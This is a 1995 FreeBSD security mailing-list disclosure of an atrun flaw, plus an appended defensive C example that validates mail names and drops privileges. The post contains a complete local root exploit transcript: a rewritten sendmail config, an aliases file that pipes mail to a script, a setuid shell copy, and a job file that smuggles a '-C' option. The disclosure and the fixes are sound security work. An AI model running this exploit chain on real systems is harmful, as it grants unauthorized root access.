From owner-freebsd-security Tue Apr 4 06:27:58 1995
Return-Path: security-owner
Received: (from majordom@localhost) by freefall.cdrom.com (8.6.10/8.6.6) id GAA12441 for security-outgoing; Tue, 4 Apr 1995 06:27:58 -0700
Received: from taurus.math.tau.ac.il (taurus.math.tau.ac.il [132.67.64.4]) by freefall.cdrom.com (8.6.10/8.6.6) with ESMTP id GAA12363 for ; Tue, 4 Apr 1995 06:23:02 -0700
Received: from lune.math.tau.ac.il (adam@lune.math.tau.ac.il [132.67.96.11]) by taurus.math.tau.ac.il (8.6.10/8.6.10) with ESMTP id PAA28587 for ; Tue, 4 Apr 1995 15:20:46 +0200
From: adam
Received: (adam@localhost) by lune.math.tau.ac.il (8.6.9/8.6.9) id QAA09588 for freebsd-security@FreeBSD.org; Tue, 4 Apr 1995 16:20:44 +0300
Message-Id: <199504041320.QAA09588@lune.math.tau.ac.il>
Subject: atrun hole
To: freebsd-security@FreeBSD.org
Date: Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300)
X-Sender: adam@math.tau.ac.il
X-Organization: DIS WHEEL SHALL EXPL0DE
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 3951
Sender: security-owner@FreeBSD.org
Precedence: bulk

There are some security problems in the FreeBSD atrun(8) system, one of which allows root access to be obtained easily.

First, before running a job, atrun takes an 8 character string from the at job file, assumes it is the login of someone to mail, and passes it to sendmail without any checks. The code says that atrun is run setuid root, and therefore it tries to remain secure by using a scheme which revokes privileges based on changing the real and effective uids of the process. Note, *uids*. However, since (both according to the man page, and the way FreeBSD comes set up) atrun is not setuid root, but executed from /etc/crontab -- it is really run by the root uid. This means that no matter what atrun does, it executes sendmail as root, and there's the hole, which allows root to be broken. An exploit for this problem is included below.
The second problem is that atrun only calls setgid() and setuid() to reduce privileges, and doesn't call initgroups(). This leaves jobs run by atrun being in every group root is in.

The author of the program, Thomas Koenig, has released a better version of the system, at-2.7a, for Linux. It fixes all of these problems. Therefore, as an immediate fix, I suggest obtaining and installing that version, though I'm unsure of how smoothly it will go, considering it's a Linux program.

ftp://sunsite.unc.edu/pub/Linux/system/Daemons/at-2.7a.tgz

He writes --

``If it's ok by the FreeBSD people, I'll put out version 2.8 (which checks for the presence of a '-' in the name to be mailed to, and then doesn't invoke the mailer) up with a BSD copyright again, but that'll take a bit of time.''

And, later --

Subject: Re: atrun hole
To: adam@math.tau.ac.il (adam)
Date: Tue, 4 Apr 1995 01:20:36 +0200 (MET DST)
In-Reply-To: <199503311834.UAA29332@lune.math.tau.ac.il> from "adam" at Mar 31, 95 08:34:34 pm
From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 324

An additional thought...

If there's any problem because of the GPL copyright on at 2.7a, I, with this mail, give the *BSD maintainers permission to put it under the same BSD-style license which I've slapped on 2.5 or whatever old version it was I sent them.

Please feel free to forward this as appropriate.

Thomas Koenig

===

The following works provided the at jobs directory (/var/at/jobs) is accessible to users. It is with FreeBSD. It is set to mode 0700 with at-2.7a.
5:53pm [eden:~] % whoami
adam
5:53pm [eden:~] % cd /tmp
5:53pm [eden:/tmp] % sed -e 's/Og1/Og0/' -e 's/Ou1/Ou0/' -e 's/etc\/aliases/tmp\/aliases/' /etc/sendmail.cf > c
5:54pm [eden:/tmp] % cat > aliases
postmaster: "|/tmp/rootme"
root: "|/tmp/rootme"
adam: "|/tmp/rootme"
^D
5:55pm [eden:/tmp] % /usr/sbin/sendmail -bi -oA/tmp/aliases -oQ/tmp
/tmp/aliases: 3 aliases, longest 14 bytes, 60 bytes total
5:55pm [eden:/tmp] % cat > rootme
#!/bin/sh
/bin/cp /bin/sh /tmp/sh
/bin/chmod 6777 /tmp/sh
^D
5:55pm [eden:/tmp] % chmod 755 rootme
5:56pm [eden:/tmp] % at now + 1 min
fooz
^D
Job a00ca9a79.000 will be executed using /bin/sh
5:56pm [eden:/tmp] % joe /var/at/jobs/a00ca9a79.000
5:56pm [eden:/tmp] % cat /var/at/jobs/a00ca9a79.000
#! /bin/sh
# mail -C/tmp/c 1
umask 22
HOME=\/home\/adam; export HOME
SHELL=\/usr\/local\/bin\/tcsh; export SHELL
LOGNAME=adam; export LOGNAME
USER=adam; export USER
PATH=\/home\/adam\/bin\:\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin\:\/usr\/local\:\/usr\/local\/bin; export PATH
HOSTTYPE=FreeBSD; export HOSTTYPE
VENDOR=intel; export VENDOR
OSTYPE=FreeBSD; export OSTYPE
MACHTYPE=i386; export MACHTYPE
SHLVL=1; export SHLVL
PWD=\/tmp; export PWD
HOST=eden; export HOST
PAGER=less; export PAGER
VISUAL=joe; export VISUAL
MANPATH=\/usr\/share\/man\:\/usr\/local\/man\:\/usr\/man\:\/home\/adam\/man; export MANPATH
cd /tmp
fooz
5:56pm [eden:/tmp] % sleep 240
DING!
[eden:/tmp] % /tmp/sh
# whoami
root
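The post identifies three things a daemon like atrun has to get right: the mail name read from the job file must be validated before it is handed to sendmail (the '-' check Koenig describes for at 2.8, which stops the name from being read as a mailer option), privileges must be dropped with initgroups() before setgid() and setuid() so the job does not keep root's supplementary groups, and the jobs directory must be private (mode 0700, as in at-2.7a) so users cannot edit queued job files. The C below is an added example written for this page to show those three checks; it is not code from the original post nor from at/atrun, and the function names validate_mail_name, drop_privileges, jobs_dir_is_private and the constant MAILNAME_LEN are hypothetical.

```c
/* Added example for this page; not code from the original post or from
 * at/atrun.  All function names and MAILNAME_LEN are hypothetical. */
#define _DEFAULT_SOURCE
#include <ctype.h>
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define MAILNAME_LEN 8   /* atrun reads an 8-character mail name from the job file */

/* Return 1 if 'name' is acceptable as a login to pass to the mailer, else 0.
 * Rules: non-empty, at most MAILNAME_LEN characters, must not begin with '-'
 * (sendmail would parse it as an option), and every character must be
 * alphanumeric, '_', '.' or '-' (no whitespace, no shell or address
 * metacharacters). */
int validate_mail_name(const char *name)
{
    if (name == NULL)
        return 0;
    size_t len = strlen(name);
    if (len == 0 || len > MAILNAME_LEN)
        return 0;
    if (name[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '.' || c == '-'))
            return 0;
    }
    return 1;
}

/* Return 1 if 'path' is a real directory (not a symlink) owned by 'owner'
 * with no group or other permission bits set (i.e. mode 0700), else 0. */
int jobs_dir_is_private(const char *path, uid_t owner)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return 0;
    if (!S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != owner)
        return 0;
    if ((st.st_mode & 077) != 0)   /* any group/other bits present */
        return 0;
    return 1;
}

/* Drop from root to the job owner.  Order matters: supplementary groups
 * first (initgroups needs root), then the primary gid, then the uid last
 * (after setuid we can no longer change groups).  Returns 0 on success,
 * -1 on failure with errno set.  The drop is verified, including that
 * root can no longer be regained. */
int drop_privileges(const char *user, uid_t uid, gid_t gid)
{
    if (initgroups(user, gid) != 0)
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    /* Real and effective ids must both be the target now. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid) {
        errno = EPERM;
        return -1;
    }
    /* If we left root, regaining it must fail. */
    if (uid != 0 && setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample names; "-C/tmp/c" is the shape of name the post's
     * job file uses to pass an option to the mailer. */
    const char *samples[] = { "adam", "root", "-C/tmp/c", "a b", "abcdefghi", NULL };
    for (int i = 0; samples[i] != NULL; i++)
        printf("mail name %-10s -> %s\n", samples[i],
               validate_mail_name(samples[i]) ? "accepted" : "rejected");
    printf("/var/at/jobs private to root: %s\n",
           jobs_dir_is_private("/var/at/jobs", 0) ? "yes" : "no");
    return 0;
}
```

drop_privileges() is the part that addresses the initgroups() omission; it only has an effect when the caller is root, which is exactly the situation the post describes (atrun run from root's crontab rather than setuid), so the verification step at the end is what tells a non-root test run that nothing was actually dropped.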